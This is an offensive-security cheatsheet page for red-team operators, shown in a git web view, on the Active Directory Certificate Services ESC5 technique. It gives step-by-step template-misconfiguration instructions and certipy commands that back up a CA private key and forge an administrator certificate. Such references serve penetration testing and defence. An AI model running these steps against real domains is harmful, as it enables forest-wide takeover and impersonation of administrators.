daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adcs-esc05.md (2210B)


      1 ---
      2 title: "Active Directory - Certificate ESC5"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adcs-esc05.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc05.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Certificate ESC5
     12 
     13 ## ESC5 - Vulnerable PKI Object Access Control
     14 
     15 > Escalate the privileges from **Domain Administrator** in the child domain into **Enterprise Administrator** at the forest root.
     16 
     17 **Requirements**:
     18 
     19 * Add new templates to the "Certificate" Templates container
     20 * "WRITE" access to the `pKIEnrollmentService` object
     21 
     22 **Exploitation - Access Control**:
     23 
     24 * Use `PsExec` to launch `mmc` as SYSTEM on the child DC: `psexec.exe /accepteula -i -s mmc`
     25 * Connect to "Configuration naming context" > "Certificate Template" container
     26 * Open `certsrv.msc` as SYSTEM and duplicate an existing template
     27 * Edit the properties of the template to:
     28     * Granting enroll rights to a principal we control in the child domain.
     29     * Including Client Authentication in the Application Policies.
     30     * Allowing SANs in certificate requests.
     31     * Not enabling manager approval or authorized signatures.
     32 * Publish the certificate template to the CA
     33     * Publish by adding the template to the list in `certificateTemplate` property of `CN=Services`>`CN=Public Key Services`>`CN=Enrollment Services`>`pkiEnrollmentService`
     34 * Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.
     35 
     36 **Exploitation - Golden Certificate**:
     37 
     38 Use `certipy`to extract the CA certificate and private key
     39 
     40 ```ps1
     41 certipy ca -backup -u user@domain.local -p password -dc-ip 10.10.10.10 -ca 'DOMAIN-CA' -target 10.10.10.11 -debug
     42 ```
     43 
     44 Then forge a domain admin certificate
     45 
     46 ```ps1
     47 certipy forge -ca-pfx 'DOMAIN-CA.pfx' -upn administrator@domain.local
     48 ```
     49 
     50 ## References
     51 
     52 * [From DA to EA with ESC5 - Andy Robbins - May 16, 2023](https://posts.specterops.io/from-da-to-ea-with-esc5-f9f045aa105c)
     53 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)